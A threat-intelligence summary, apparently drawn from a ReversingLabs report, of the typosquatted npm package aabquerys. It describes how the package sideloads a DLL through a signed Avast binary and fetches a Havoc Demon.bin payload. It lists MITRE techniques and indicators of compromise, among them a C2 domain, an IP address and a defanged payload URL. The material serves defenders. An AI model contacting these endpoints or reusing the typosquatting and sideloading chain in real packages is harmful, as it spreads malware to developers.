Threat Research

Open-source repository malware sows Havoc

Securonix

ReversingLabs identified aabquerys, a malicious npm package that downloads second and third stage malware payloads to systems that have downloaded and run the npm package. This incident highlights growing open source supply chain risks in npm, PyPi, and GitHub, driven by typosquatting and obfuscated code. #aabquerys #NPM #Havoc #Demon.bin #wsc_proxy #typosquatting #openSourceSupplyChain

Keypoints

  • The aabquerys package is a malicious npm module that downloads second- and third-stage payloads to infected systems.
  • The campaign employs typosquatting by mimicking legitimate modules (e.g., abquery) to fool developers into installing it.
  • The package contains obfuscated JavaScript code, a known red flag in open source modules.
  • Sideloading is used: aabquerys delivers a malicious wsc.dll into the process space of wsc_proxy.exe, which is launched and calls the DLL’s run function.
  • The third-stage component, Demon.bin, is downloaded from an external C2 site and implements Havoc-based RAT capabilities.
  • Maintainer accounts (e.g., obm2y67w, cq0km9hu) published multiple related packages (nvm_jquery, aabquery) with identical malicious behavior.
  • Although npm removed the packages and current risk appears limited, the incident underscores open source supply chain risks and the need for vigilance against obfuscated code and external assets.

MITRE Techniques

  • [T1195] Supply Chain Compromise – Malicious npm package used to deliver second/third stage payloads to systems that downloaded and ran the npm package. ‘aabquerys, a malicious npm package that downloads second and third stage malware payloads to systems that have downloaded and run the npm package.’
  • [T1027] Obfuscated/Compressed Files and Information – Obfuscated code in the open source package; ‘one of which was obfuscated using the Javascript obfuscator’ and ‘the obfuscated code in question was easily de-obfuscated.’
  • [T1574.001] DLL Side-Loading – Sideloading performed by placing a DLL named wsc.dll with an exported run function in the same folder as wsc_proxy.exe; the legitimate executable starts and invokes the malicious DLL’s run.
  • [T1105] Ingress Tool Transfer – Demon.bin (third-stage) downloaded from an external C2 site (‘…downloads the third stage malicious component, Demon.bin, from an external command and control site…’).
  • [T1218] Signed Binary Proxy Execution – The wsc_proxy.exe is signed with a certificate issued to AVAST Software s.r.o., enabling the DLL sideload.
  • [T1071] Web Protocols – The agent connects to the C2 server using the zh[.]googlecdnb.tk domain (‘connects to the C2 server using the zh[.]googlecdnb.tk domain’).

Indicators of Compromise

  • [Package name] context – aabquery, aabquerys, and nvm_jquery (1.0.0–1.0.2) versions
  • [SHA1] context – 62036fd054bac1375fe1205dc595a246e9d94a83, 4789cf9141da47fe265e3d646609d864e0074711, 36cce0d19253d08252d0d3ade1755d6b064786ae, 09a47a484c8e83f0d36772a445b4e6bc12dc247b, 745f47e5349a99ee867fc1f5358462d176f97c6f
  • [File/Executable name] context – install_flash_player_ppapi.exe (0dd0784b875183c5c8701ae4f46ed371a16fd6b3), wsc.dll (4ae6fec8052a9648abaaa7b41625c911f355eaa7)
  • [File/Executable name] context – demon.bin (a3dc96b5553606a039a68783989eba4cc0732b3a), core Havoc dll (4b0c13a054cadbfddf82686f4b4ff082e9cae428)
  • [Domain] context – zh.googlecdnb.tk
  • [IP Address] context – 3.136.16.137
  • [URL] context – hxxp://3.136.16.137/vendor/htmlawed/htmlawed/demon.bin

Read more: https://www.reversinglabs.com/blog/open-source-malware-sows-havoc-on-supply-chain